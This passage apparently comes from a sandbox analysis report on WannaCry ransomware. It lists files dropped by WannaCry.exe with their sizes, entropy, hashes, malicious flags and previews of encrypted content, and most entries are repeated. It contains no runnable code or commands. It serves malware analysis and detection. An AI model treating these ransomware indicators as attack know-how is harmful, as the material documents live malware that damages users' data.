                                                                              Malicious:true
                                                                              Preview:WANACRY!....R.P.g...(.Y.`.p.....j'"..@$w...':%.1V...1.....~..^.Q#'.t..4..Tq....f.Q........2..&...HC....<.]..{.o..s.e...urp-..s..|X..Z.w.B.4..8..^N....,.N..5...+....>...6\. -N.K.mt..bn.y._......6.`#G.u..LKH....J.....:K?5._@../..*.M..*..s4.........7.Y?........7...........SQs.`@..7..}7~.G..6D.R[.......}.].f..e......I..IgEvJiF..ZU.{..C.>....B......V7...4&....F4......e......x....}...f..X@.q.0@.p.-.*..1...iP*K..).qu..>...i...[.g.u.@O...W...H._[q*"...1@..3v......\..`8...M.F[..jrc....G.p.....7.G`..K.le...!.5..7...9...}.5....w..w....-.....0...........$.cf..k..v5...!.;.[_....w9D.'@('.N..t..&]6E.>.R..A...|..VX..T.:.D...\........; .A.d[b-..N....O.....c....F43x...../..j.....f..hp...'F..?.['.....o...C%.~..FFG(.[.H..\D..._...CZ..?..f..B@vp.{.xg.:....;C....TZ..`..U-........w..AiTC^....6..Wi.........0.....Ms.,T.......t .7$t[Z0........PC.]_....t...L.O.`..?E...t..-..(....x..A...A.."#.Bt.f4.>../pK.4.7..OMy. ..Lu.*,y4`}SNTv.{...An?.y...>l...&..)."..L...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):988600
                                                                              Entropy (8bit):7.999823585026383
                                                                              Encrypted:true
                                                                              SSDEEP:24576:uw3YLLnYqS8IXM/1+rgn18MHLgtIq1X6DEVdCM03ru:bYLLnY38IXAm010H07u
                                                                              MD5:9BE93BAD48F72DC1EFA8B7BF96C50053
                                                                              SHA1:19ACCAB70585219484934AF865C42F564F52528D
                                                                              SHA-256:0615CDF4BF0BCE60861AA3FE3688194328D7BB76EC308DF426A4C6428759D56D
                                                                              SHA-512:FD65AEACF1D37E0AE0BBC80694071C560568665C0CA5CD0CB92C3A5A01227147D1C1C217BB4A57888645809E4811E80060A119A777946E5F09FE762094F2613F
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......#..hO..|5...QO.Coh.u..X..;.rV.I..zm9A...>.X.D{9.=.(..T.A!...`=kXCG..7....6m..U.Y#o..-..]..-jd....Qy.jta.OS.w..5.H.\.y-.6Q....z.<.l?z...Ht(.z...3.~.)V..../.._..Q5...v.'....F.H......p..Md...;............G..y...Bb.......C"+.......0i..O.....s"U...............2%/.r;.Y...+..2...+dlr...5.:<..u{...].^z.W.....4..h.p'..Sj.B...@/.P+.....*.....~..<..h.*..WF...J~...8.._..c.60F3h!...._.?...X.*...C.lC.n..-..'N.J.3.......~.y.=.J|.J.;...EH..N.G.x....5.....jn...g..j@^.H....S..1Xg..t;[.G*5X...(n..B.H.........^Z"..X...{.?...xL..2...L3.O..`]6}..r..#Vzs.X.8......f.F..WW.#.".....D....C...c..%.+...#7....1...c.G....o.<.l7.......&.....Z.<.%..~..*...A5.{Rf..ow..$.....Q..r.[.......{8../..[.c....f.N.W.#..p.m...>?PC...0.....(......I.........?h.?8+H.v...U0_..sI...S..M(.sR..8*(<..b...c.....O.{.l._.<.._p..LtCA..f..@....T.E...)...gc.s......}..L.Z..+.....@.8.2Z.4..k..C.'~.-.+u.@.h......q^..I.k......WMQ....~.k.r^$~.}..Y.<s^t.Rs.\.Q>....2.<...n.s#.uM..0.-..i.*.gN...r
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):988600
                                                                              Entropy (8bit):7.999823585026383
                                                                              Encrypted:true
                                                                              SSDEEP:24576:uw3YLLnYqS8IXM/1+rgn18MHLgtIq1X6DEVdCM03ru:bYLLnY38IXAm010H07u
                                                                              MD5:9BE93BAD48F72DC1EFA8B7BF96C50053
                                                                              SHA1:19ACCAB70585219484934AF865C42F564F52528D
                                                                              SHA-256:0615CDF4BF0BCE60861AA3FE3688194328D7BB76EC308DF426A4C6428759D56D
                                                                              SHA-512:FD65AEACF1D37E0AE0BBC80694071C560568665C0CA5CD0CB92C3A5A01227147D1C1C217BB4A57888645809E4811E80060A119A777946E5F09FE762094F2613F
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......#..hO..|5...QO.Coh.u..X..;.rV.I..zm9A...>.X.D{9.=.(..T.A!...`=kXCG..7....6m..U.Y#o..-..]..-jd....Qy.jta.OS.w..5.H.\.y-.6Q....z.<.l?z...Ht(.z...3.~.)V..../.._..Q5...v.'....F.H......p..Md...;............G..y...Bb.......C"+.......0i..O.....s"U...............2%/.r;.Y...+..2...+dlr...5.:<..u{...].^z.W.....4..h.p'..Sj.B...@/.P+.....*.....~..<..h.*..WF...J~...8.._..c.60F3h!...._.?...X.*...C.lC.n..-..'N.J.3.......~.y.=.J|.J.;...EH..N.G.x....5.....jn...g..j@^.H....S..1Xg..t;[.G*5X...(n..B.H.........^Z"..X...{.?...xL..2...L3.O..`]6}..r..#Vzs.X.8......f.F..WW.#.".....D....C...c..%.+...#7....1...c.G....o.<.l7.......&.....Z.<.%..~..*...A5.{Rf..ow..$.....Q..r.[.......{8../..[.c....f.N.W.#..p.m...>?PC...0.....(......I.........?h.?8+H.v...U0_..sI...S..M(.sR..8*(<..b...c.....O.{.l._.<.._p..LtCA..f..@....T.E...)...gc.s......}..L.Z..+.....@.8.2Z.4..k..C.'~.-.+u.@.h......q^..I.k......WMQ....~.k.r^$~.}..Y.<s^t.Rs.\.Q>....2.<...n.s#.uM..0.-..i.*.gN...r
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5653560
                                                                              Entropy (8bit):7.999968050560135
                                                                              Encrypted:true
                                                                              SSDEEP:98304:iB/FsU0o80N6NooCOyDSoZyS9uHtb7xZH0EwJJxW0fVnzXIprzAq4H1:iB9sDNC1WUP4tb7xh0E0vdz2Ze1
                                                                              MD5:E23566FF350C78216AAE3AAEA281C069
                                                                              SHA1:14BFC2851DE0C6F90C94BE4B11996C4B474BD866
                                                                              SHA-256:E0FD4F492A13FD4CC9A2B3DDCC0820F79FFC3597FC94C4C84DA94643AF96D1B2
                                                                              SHA-512:91B4CEF6000009B9130F0CE08A89546A587DE7C70B4F4A812D343E86556C4E048125E072A3734EB5D166ACA1ABD5C36DB2C1E76A98DEDA3B9047A5FD6452456A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.f..z...d.|o...Q..[a.>...,@^.....'.au.6..VN.p!;....L..E.&.e.....@....x.=7i....9............d..."l......e...&."...J.....X.M..H6I.M~:....V.A.Hx.V..s_......F.[2..<Ly^...A...?5.H.pY)8...h.$j....zN......{.....=...6...y......Lo".l).&...oM.....L...........CV.....l..}F9.i.a.A/.4..Tc...1%.......|.8......=].......,L. 1..5xOB.R..G..)....u....R.&..2..G.. .G*Q.A..6X.......p..Z.Z0Q..6|....!.j.[.MA.}..VG.-...e......@....<...]F..L.(..6M..Y...x..M.(G.q..&..gf.G\..h....O3....[.s.>x..If{....*..'....00.d-zy.../......D.._....c.. ..o}.Oze....')f+.7..o..r....3O..}M..*.9?...;U..F..._.H..H;......f.&.....41...+."..U9.E.3fd.}.M........SQ.RNh...M.u.#M.B..9.....].+.(F0..,...X.;.,tUZ.......\.{...4t..k<V....Z..4.'K.}.i.HH..|.{.%..M..[\Kg'x..Wb._'`..}..?.yq.B.....o`|.+..T.O.9M$|....n..D{...XH.h.9.b..)...2.....M_.IfK..n8.V...F?...\s..u.H......o..I.9g\..Z..;........~#(..-..cJ....G.. ._.c.F.....e.[.q....&5z....X$.r.....a.U.".4...vtA..)....*.O;Z`B.9QN....@4]..2......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5653560
                                                                              Entropy (8bit):7.999968050560135
                                                                              Encrypted:true
                                                                              SSDEEP:98304:iB/FsU0o80N6NooCOyDSoZyS9uHtb7xZH0EwJJxW0fVnzXIprzAq4H1:iB9sDNC1WUP4tb7xh0E0vdz2Ze1
                                                                              MD5:E23566FF350C78216AAE3AAEA281C069
                                                                              SHA1:14BFC2851DE0C6F90C94BE4B11996C4B474BD866
                                                                              SHA-256:E0FD4F492A13FD4CC9A2B3DDCC0820F79FFC3597FC94C4C84DA94643AF96D1B2
                                                                              SHA-512:91B4CEF6000009B9130F0CE08A89546A587DE7C70B4F4A812D343E86556C4E048125E072A3734EB5D166ACA1ABD5C36DB2C1E76A98DEDA3B9047A5FD6452456A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.f..z...d.|o...Q..[a.>...,@^.....'.au.6..VN.p!;....L..E.&.e.....@....x.=7i....9............d..."l......e...&."...J.....X.M..H6I.M~:....V.A.Hx.V..s_......F.[2..<Ly^...A...?5.H.pY)8...h.$j....zN......{.....=...6...y......Lo".l).&...oM.....L...........CV.....l..}F9.i.a.A/.4..Tc...1%.......|.8......=].......,L. 1..5xOB.R..G..)....u....R.&..2..G.. .G*Q.A..6X.......p..Z.Z0Q..6|....!.j.[.MA.}..VG.-...e......@....<...]F..L.(..6M..Y...x..M.(G.q..&..gf.G\..h....O3....[.s.>x..If{....*..'....00.d-zy.../......D.._....c.. ..o}.Oze....')f+.7..o..r....3O..}M..*.9?...;U..F..._.H..H;......f.&.....41...+."..U9.E.3fd.}.M........SQ.RNh...M.u.#M.B..9.....].+.(F0..,...X.;.,tUZ.......\.{...4t..k<V....Z..4.'K.}.i.HH..|.{.%..M..[\Kg'x..Wb._'`..}..?.yq.B.....o`|.+..T.O.9M$|....n..D{...XH.h.9.b..)...2.....M_.IfK..n8.V...F?...\s..u.H......o..I.9g\..Z..;........~#(..-..cJ....G.. ._.c.F.....e.[.q....&5z....X$.r.....a.U.".4...vtA..)....*.O;Z`B.9QN....@4]..2......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12216
                                                                              Entropy (8bit):7.985417981374031
                                                                              Encrypted:false
                                                                              SSDEEP:192:tigjO917xDGPZWo78RzpVcag41HYh7n+t15b/f688YZDrRLj0n02wd18UIpvhy:da9xIPgoGVcRDh7+35288YZx60FIry
                                                                              MD5:70E3431705990443884B6B3EAB103CB8
                                                                              SHA1:579DE0F8E831062D8DEF8C87FF39C2E7C9A1355D
                                                                              SHA-256:47A2C0BE092100EAC5DD996E7EFBD4308A1663643A7AB4FA2231FEC8590C71D7
                                                                              SHA-512:7179EC57A628FDD7A8A6B031885FED91265FF4D1F243EF2759D18A7E98DFAD252CE09E883BA3B64D0AE0AF5B53B9AE1EB310AFD496617556DD8375AD93AD3460
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Eek.{.2wM.F.3........C.....+.Oq.n.quc\..l.i.K.p.K.k*...O...f9X.d...+..(.SR:Kd.b9..!t.p.&.#D...W`6..j.>..O......i..hs....N....EU..:tS....'E..&.|~31.0$.K^..91!.....9.r.H..[..z.....>...._....JR........GI.K2 .#[...V.=>W.......zmi.(...uv.2..k.*.:.4...............~....?.V.`..s.\w]...9....2.|.......+.V...........I9,.!f.r.....N...7..<.;Y3..fw.}.;..zz.N.x..\.....J.r...Y.t....7\...]....W.F.v1.%.6<..Tn.u.X.3...L....A.....].?B.V............Y..M..../..&O.h.I..w"...)..f.6C...rQ..v..).C...,...{...D[Z..I.r......9.F:.Cp.x#...o....T...%..$.........5..`n*.....].*...@.o.;{o-.AeP......,...7;.<.....9l....c..9.J.D.`.....Q2.C.YX.w.....2..@.....n.......OL.....CR..y^...6.....*.../.X...HBR.......1Qg..q.M:.....}....T....I.R...J.......cJ&...Q/A.f8ms};......i\..(....ob..j}l.}qo.m.Y....,.......5..l.....7d .pgu"c.......CE.th#f.!..h.o.}.e2$.....<.m.YO?.$.u..L...9 ....x...f....JY.....qv-_.,G..4.....]...E....@.~#".f.F...r+.....FOGR8]..Q.O..-T.am.~.....^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12216
                                                                              Entropy (8bit):7.985417981374031
                                                                              Encrypted:false
                                                                              SSDEEP:192:tigjO917xDGPZWo78RzpVcag41HYh7n+t15b/f688YZDrRLj0n02wd18UIpvhy:da9xIPgoGVcRDh7+35288YZx60FIry
                                                                              MD5:70E3431705990443884B6B3EAB103CB8
                                                                              SHA1:579DE0F8E831062D8DEF8C87FF39C2E7C9A1355D
                                                                              SHA-256:47A2C0BE092100EAC5DD996E7EFBD4308A1663643A7AB4FA2231FEC8590C71D7
                                                                              SHA-512:7179EC57A628FDD7A8A6B031885FED91265FF4D1F243EF2759D18A7E98DFAD252CE09E883BA3B64D0AE0AF5B53B9AE1EB310AFD496617556DD8375AD93AD3460
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Eek.{.2wM.F.3........C.....+.Oq.n.quc\..l.i.K.p.K.k*...O...f9X.d...+..(.SR:Kd.b9..!t.p.&.#D...W`6..j.>..O......i..hs....N....EU..:tS....'E..&.|~31.0$.K^..91!.....9.r.H..[..z.....>...._....JR........GI.K2 .#[...V.=>W.......zmi.(...uv.2..k.*.:.4...............~....?.V.`..s.\w]...9....2.|.......+.V...........I9,.!f.r.....N...7..<.;Y3..fw.}.;..zz.N.x..\.....J.r...Y.t....7\...]....W.F.v1.%.6<..Tn.u.X.3...L....A.....].?B.V............Y..M..../..&O.h.I..w"...)..f.6C...rQ..v..).C...,...{...D[Z..I.r......9.F:.Cp.x#...o....T...%..$.........5..`n*.....].*...@.o.;{o-.AeP......,...7;.<.....9l....c..9.J.D.`.....Q2.C.YX.w.....2..@.....n.......OL.....CR..y^...6.....*.../.X...HBR.......1Qg..q.M:.....}....T....I.R...J.......cJ&...Q/A.f8ms};......i\..(....ob..j}l.}qo.m.Y....,.......5..l.....7d .pgu"c.......CE.th#f.!..h.o.}.e2$.....<.m.YO?.$.u..L...9 ....x...f....JY.....qv-_.,G..4.....]...E....@.~#".f.F...r+.....FOGR8]..Q.O..-T.am.~.....^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):358056
                                                                              Entropy (8bit):7.999460639541854
                                                                              Encrypted:true
                                                                              SSDEEP:6144:fBfPDaQaVaoX1kk8xuU/+injLyFocNXKQDFCC767I1FpMXncyiCOucEf9vJ084sO:f9IcoXCkBOhOecNXKGos67IB0i8XcRsO
                                                                              MD5:B9BB2BD43F9919E44F850CF89374E482
                                                                              SHA1:8EE8BED2ACA0EDCC9F119F8FF33DEEA74A3A8139
                                                                              SHA-256:64D7EA56E34F7A5E7646C61908DC44746359CC7AA80A59CDDE28A010B99FB722
                                                                              SHA-512:D510880B4E3A604337D341BF037AC1702F29F7ACF5924D4EF465AA1BF458FDB6455DD53DAAB4321C78277E10629ADA9FD6E509088F48EF0790C64954FA7EAF9A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....?2.....T\3.../.......> l.r.......ma..c6h...X.........:....m#..#...D....9.^.4(N..I...p..[E)."FrR.wn.v...7../Ae..A....e.6.(o.laez..2u..'.......(hv@.C.!I.k.....M/z...d..6........!E..f.Z.x..EJ[...V..I..nO.......[.._4>.E...1.....i..."K..8...7|k....H.....u......HH9.w..........6..*..2l.v l|./..>uYt...).U.["..^.h.^9...6WR.1...S.o.,9H8.60. v..r..t....W. .V.d1m."..D.......rt.3G.)V...rw..^.uF.~W..7.>UP8$..n.%s<j.K.4..>..:.-.1<>1...H<.FD.....|......Z....|3..I...0.....D}.C.$..L..<..N'l..b.^.Ox..M...Oa.{.....4..}*z....3-.E5v.....>..K.<.S...?..>..#.nS.mnlC*xO}|.g.|...:.....s..D."#........_.1WS|.^9.JKY....;....'M{.r.;K.euI....uyz.>...j#+.u....Bz..x;.Y.g..F6...uS....nc...T.q.~H.L.s..._...L.b...Og=C...;.R.0......3....b..Q.[.G.\b....SLk...N. CQ4..|...~.>.L=..C.JL1z.[.@..e..C=.[..".Kq p.....J/9.:5.O`...!22.8(Sz..e.......T....K.._{.....0.f....n...q+...Ys..?>.MD[zYz...'o.=-...]B..m`...x..PV....k...H[..........c>K....F.u..L.%qg.o........%..7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):358056
                                                                              Entropy (8bit):7.999460639541854
                                                                              Encrypted:true
                                                                              SSDEEP:6144:fBfPDaQaVaoX1kk8xuU/+injLyFocNXKQDFCC767I1FpMXncyiCOucEf9vJ084sO:f9IcoXCkBOhOecNXKGos67IB0i8XcRsO
                                                                              MD5:B9BB2BD43F9919E44F850CF89374E482
                                                                              SHA1:8EE8BED2ACA0EDCC9F119F8FF33DEEA74A3A8139
                                                                              SHA-256:64D7EA56E34F7A5E7646C61908DC44746359CC7AA80A59CDDE28A010B99FB722
                                                                              SHA-512:D510880B4E3A604337D341BF037AC1702F29F7ACF5924D4EF465AA1BF458FDB6455DD53DAAB4321C78277E10629ADA9FD6E509088F48EF0790C64954FA7EAF9A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....?2.....T\3.../.......> l.r.......ma..c6h...X.........:....m#..#...D....9.^.4(N..I...p..[E)."FrR.wn.v...7../Ae..A....e.6.(o.laez..2u..'.......(hv@.C.!I.k.....M/z...d..6........!E..f.Z.x..EJ[...V..I..nO.......[.._4>.E...1.....i..."K..8...7|k....H.....u......HH9.w..........6..*..2l.v l|./..>uYt...).U.["..^.h.^9...6WR.1...S.o.,9H8.60. v..r..t....W. .V.d1m."..D.......rt.3G.)V...rw..^.uF.~W..7.>UP8$..n.%s<j.K.4..>..:.-.1<>1...H<.FD.....|......Z....|3..I...0.....D}.C.$..L..<..N'l..b.^.Ox..M...Oa.{.....4..}*z....3-.E5v.....>..K.<.S...?..>..#.nS.mnlC*xO}|.g.|...:.....s..D."#........_.1WS|.^9.JKY....;....'M{.r.;K.euI....uyz.>...j#+.u....Bz..x;.Y.g..F6...uS....nc...T.q.~H.L.s..._...L.b...Og=C...;.R.0......3....b..Q.[.G.\b....SLk...N. CQ4..|...~.>.L=..C.JL1z.[.@..e..C=.[..".Kq p.....J/9.:5.O`...!22.8(Sz..e.......T....K.._{.....0.f....n...q+...Ys..?>.MD[zYz...'o.=-...]B..m`...x..PV....k...H[..........c>K....F.u..L.%qg.o........%..7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4552
                                                                              Entropy (8bit):7.950176053868954
                                                                              Encrypted:false
                                                                              SSDEEP:96:o5TJZ5V4sfj7odCtiAUUTKb7q9WBJ3yjFOXfGWjaXG9ex:y5isfMCtizb76WBF6OPGfG0x
                                                                              MD5:EB670EFC41F80C7023BA3B7777FEBD98
                                                                              SHA1:68C705C869FF85759CBD7612D2B5B2BCBE33FE13
                                                                              SHA-256:913B1C715C80F68177F40C6D034CCC817D1BB5A5E84CB281D85ECFD0226B7CB6
                                                                              SHA-512:CC6181C7DA04964397C80F0A7AF4E809141D917B2C31E264189C73B44DA489F92195FD52447E233944BDFF44CAD155620010B3C66BB692981244D72BC987AE27
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......B.o.....@.13.%..Oy.r..!.Y.&.V...T@..N....j..]=..g..K.N.;Q.i.....B=b.}Z"..=.......&.wS..|...Y.Y.z...KF..dW.C:.j..aU.\%.Vy..k.k.u[....1....>.3.E..>@./D.O&.o....6..]...odr?.-S...s........-S.....el..Zd..s.\n..yTs....DT.....h..Pw....u..l.....b............z....m(......:.......<..W..k"7.6.bB.y.e.G;.....|...z.U3X%.C.p....A.c.]Z.f...5..{..X.....$.......%..0h\..>.o<.#L.i.7..T,:.D]...t....].+.3`:...#F.K. ....d.D...U..]+`..[..G...0..A.&..L..mY&..0..o.i.Pf6\...O.....\....~.q`.kD.U.X%h#..$.m.f.f.O..#...NJ.).(R.X[M..9.r...C..xG<...th.T.-...[....OC...ZA}x:.U........D...>......z....l.RJ.2d.o,.S...7.....~;.F.b.. k...V.E...%d.N....=..9X....I.;.........n.....$..Z.L..-....o.......Q.....zxFG.....}..4p..A...[P.7........-.c..~.<..._..@..5..O.P.s..(....$..n{......9a/..d.:.2a.r..3,<c.D..ousA.M..DX9....W.......NJ.......D..$.R........<#._e...Q.a...[h....B..G,j...:..o........S.q..X....&.[j.H...|.'...@..D....?|.L.B....l#....C.T......S&..[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4552
                                                                              Entropy (8bit):7.950176053868954
                                                                              Encrypted:false
                                                                              SSDEEP:96:o5TJZ5V4sfj7odCtiAUUTKb7q9WBJ3yjFOXfGWjaXG9ex:y5isfMCtizb76WBF6OPGfG0x
                                                                              MD5:EB670EFC41F80C7023BA3B7777FEBD98
                                                                              SHA1:68C705C869FF85759CBD7612D2B5B2BCBE33FE13
                                                                              SHA-256:913B1C715C80F68177F40C6D034CCC817D1BB5A5E84CB281D85ECFD0226B7CB6
                                                                              SHA-512:CC6181C7DA04964397C80F0A7AF4E809141D917B2C31E264189C73B44DA489F92195FD52447E233944BDFF44CAD155620010B3C66BB692981244D72BC987AE27
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......B.o.....@.13.%..Oy.r..!.Y.&.V...T@..N....j..]=..g..K.N.;Q.i.....B=b.}Z"..=.......&.wS..|...Y.Y.z...KF..dW.C:.j..aU.\%.Vy..k.k.u[....1....>.3.E..>@./D.O&.o....6..]...odr?.-S...s........-S.....el..Zd..s.\n..yTs....DT.....h..Pw....u..l.....b............z....m(......:.......<..W..k"7.6.bB.y.e.G;.....|...z.U3X%.C.p....A.c.]Z.f...5..{..X.....$.......%..0h\..>.o<.#L.i.7..T,:.D]...t....].+.3`:...#F.K. ....d.D...U..]+`..[..G...0..A.&..L..mY&..0..o.i.Pf6\...O.....\....~.q`.kD.U.X%h#..$.m.f.f.O..#...NJ.).(R.X[M..9.r...C..xG<...th.T.-...[....OC...ZA}x:.U........D...>......z....l.RJ.2d.o,.S...7.....~;.F.b.. k...V.E...%d.N....=..9X....I.;.........n.....$..Z.L..-....o.......Q.....zxFG.....}..4p..A...[P.7........-.c..~.<..._..@..5..O.P.s..(....$..n{......9a/..d.:.2a.r..3,<c.D..ousA.M..DX9....W.......NJ.......D..$.R........<#._e...Q.a...[h....B..G,j...:..o........S.q..X....&.[j.H...|.'...@..D....?|.L.B....l#....C.T......S&..[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1144
                                                                              Entropy (8bit):7.832310422337037
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7nRv3NGUtHBgfTfHVJpxyMOqtHKcCpT+30JLfPzvTB/3cafk0H:bkzRQUthMTvVdHKJ+30dLa8H
                                                                              MD5:5D8A655A9EFCAC07A8AE72C2802D93A4
                                                                              SHA1:3A237FF8898924824E5B0F8C7641464EE6B5B2A6
                                                                              SHA-256:D5AB7B81131BF58928886CE59847BF050A1146C683DB8F7B799C61B898E7435E
                                                                              SHA-512:48C400109DA1663EED34F07E2D22D06D8E6210CE056BE4C77895FC7A81AE49FC4D5522C8DE37ED63D3A87AB15E991111931E1BA0E9DF041CF2CECDB21FA8FC2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!......G.&/...e.p..?vb....>.v..J.h......2... ....9%......cm~B...TS.E....-!...O..........^.G.<....N...o.l<.uX.jxO.o....,......#.|m......Q.......u8....T......x.7...gG...d.g..W.]....$.)..Vb.&;Z..o..{..[..ji;;T..(q&...K&n..Y.H.P..L....DR.`:_.C0.+..x16....._.........1Nu;.,..0/..|.xe1...].=d.%G.D-....._....B.....).....\..HP.H9..L.t..Gq;...,M9.Z...V.@P..u...^..Tngt...b..<e@......Ut...hfe.XH.>..w.X..K....>...P...+.,.pf...C../....o...p..L.............l.{.q.e%...eS(.....e...\..5..|.k.G9...'O.bE8.D.._...B..e....QQ.;..c..q....SfI\.1...@.........8...=..E....q~..~...?Nv+d5.I..F.b....O.s]B.....E.TXtJ.<g.2OK(^....n\l..K.u..z.D!'...E......d.'....T.~H.}|qGQ......6r....2.9...c.4.6.!.v.s..s.._..7...$.U.PX.......$..p.!L. .j.u..T.o..w@U_.v.p.l.It......[sf.k....J?.au...l<..*W._Y..m..S...........Fn%..5B..^.t....<.....^.eZ.)...U`.0rw.O.....q. V...K.WU.....3..m.X(=m..3`..$C.C.rD.ECZ. Z..^j.u..2.]8.O.F....+6f3.A..=.JOIJe.....^...)r...T.Q..[umw..C.$....@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1144
                                                                              Entropy (8bit):7.832310422337037
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk7nRv3NGUtHBgfTfHVJpxyMOqtHKcCpT+30JLfPzvTB/3cafk0H:bkzRQUthMTvVdHKJ+30dLa8H
                                                                              MD5:5D8A655A9EFCAC07A8AE72C2802D93A4
                                                                              SHA1:3A237FF8898924824E5B0F8C7641464EE6B5B2A6
                                                                              SHA-256:D5AB7B81131BF58928886CE59847BF050A1146C683DB8F7B799C61B898E7435E
                                                                              SHA-512:48C400109DA1663EED34F07E2D22D06D8E6210CE056BE4C77895FC7A81AE49FC4D5522C8DE37ED63D3A87AB15E991111931E1BA0E9DF041CF2CECDB21FA8FC2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!......G.&/...e.p..?vb....>.v..J.h......2... ....9%......cm~B...TS.E....-!...O..........^.G.<....N...o.l<.uX.jxO.o....,......#.|m......Q.......u8....T......x.7...gG...d.g..W.]....$.)..Vb.&;Z..o..{..[..ji;;T..(q&...K&n..Y.H.P..L....DR.`:_.C0.+..x16....._.........1Nu;.,..0/..|.xe1...].=d.%G.D-....._....B.....).....\..HP.H9..L.t..Gq;...,M9.Z...V.@P..u...^..Tngt...b..<e@......Ut...hfe.XH.>..w.X..K....>...P...+.,.pf...C../....o...p..L.............l.{.q.e%...eS(.....e...\..5..|.k.G9...'O.bE8.D.._...B..e....QQ.;..c..q....SfI\.1...@.........8...=..E....q~..~...?Nv+d5.I..F.b....O.s]B.....E.TXtJ.<g.2OK(^....n\l..K.u..z.D!'...E......d.'....T.~H.}|qGQ......6r....2.9...c.4.6.!.v.s..s.._..7...$.U.PX.......$..p.!L. .j.u..T.o..w@U_.v.p.l.It......[sf.k....J?.au...l<..*W._Y..m..S...........Fn%..5B..^.t....<.....^.eZ.)...U`.0rw.O.....q. V...K.WU.....3..m.X(=m..3`..$C.C.rD.ECZ. Z..^j.u..2.]8.O.F....+6f3.A..=.JOIJe.....^...)r...T.Q..[umw..C.$....@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5608
                                                                              Entropy (8bit):7.965918116097751
                                                                              Encrypted:false
                                                                              SSDEEP:96:olXiFraUlFxzns1ygI3OeUD6MM17XvyPG8ZnA0fb8jOREOoFmHTRv:bztcRIJp17vyPGKnTb8jOKzc5
                                                                              MD5:5E3534D69C8E7B4DAA2E94AA607B328F
                                                                              SHA1:273B90705A2F293DE891AF4B975E188655F56306
                                                                              SHA-256:91AF62AE4B21C63D587A9547814E45557CBB5BA1FC70AC79A5F0AB6131F4B860
                                                                              SHA-512:A34C0593200E56328250368E0860A1D4E3D95E72895D457396118099B2E284E3E2ABE0170CAADA619DDB829683B393521BF2008E797550BA69644C8903C324C9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......._..?.4.N.....4-.hx....f.6..G..v.z.!...^qp..D...%)e.&.A.Y.%.G.....9r....0(:...k2e. .^sd.h&......}.N.F..&...D....'...X.%.]W..W..0.f..}...~.......}....;`.~../...?.....C.D>...5D.......A......'..#.'a...SX.1r..c.>..;-.2.......~:*.Y...L.0...\f..............!x.....i..V#.m...A..p.yM.[...g..#...Q.^.....T...K..H.:.1.....E...g...W..Y..G....e.#...?......8..._a....ys....1.*.W7Tt../.s^.H.!....S.....2..?....Qj.Q..a .E.M..i..I.k....?..E.j.R.[....n/K2W.y...o3....-......dC.RXab6...........@#."79...r..>..{...,.|.z..1........|...'....g.8.....wy<..l[o..Y.....{w............r....`../...9|.n.$pj..J.{.4..g...K..@....F....2_O7.j9D............0H..{...lZHd.75.....J3.(..c.l.\.PxE.?'..g-...9t..).?..*2D....)...W..Mc..n...x.O6t..Rv...RA-lT....yH[.W...~......z...+7..&E'..p.......p).."l._W.%....ci.e..KW..;fK-..>....I...7H5..UAD8...n.....]Y=...Z...(.~..O9\T.%t.W.?+I,...!...OC}...E.IR..X....75...woH{.....<.a../#..p..]j$...m..9..S...2..}T!....n.......%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5608
                                                                              Entropy (8bit):7.965918116097751
                                                                              Encrypted:false
                                                                              SSDEEP:96:olXiFraUlFxzns1ygI3OeUD6MM17XvyPG8ZnA0fb8jOREOoFmHTRv:bztcRIJp17vyPGKnTb8jOKzc5
                                                                              MD5:5E3534D69C8E7B4DAA2E94AA607B328F
                                                                              SHA1:273B90705A2F293DE891AF4B975E188655F56306
                                                                              SHA-256:91AF62AE4B21C63D587A9547814E45557CBB5BA1FC70AC79A5F0AB6131F4B860
                                                                              SHA-512:A34C0593200E56328250368E0860A1D4E3D95E72895D457396118099B2E284E3E2ABE0170CAADA619DDB829683B393521BF2008E797550BA69644C8903C324C9
                                                                              Malicious:false
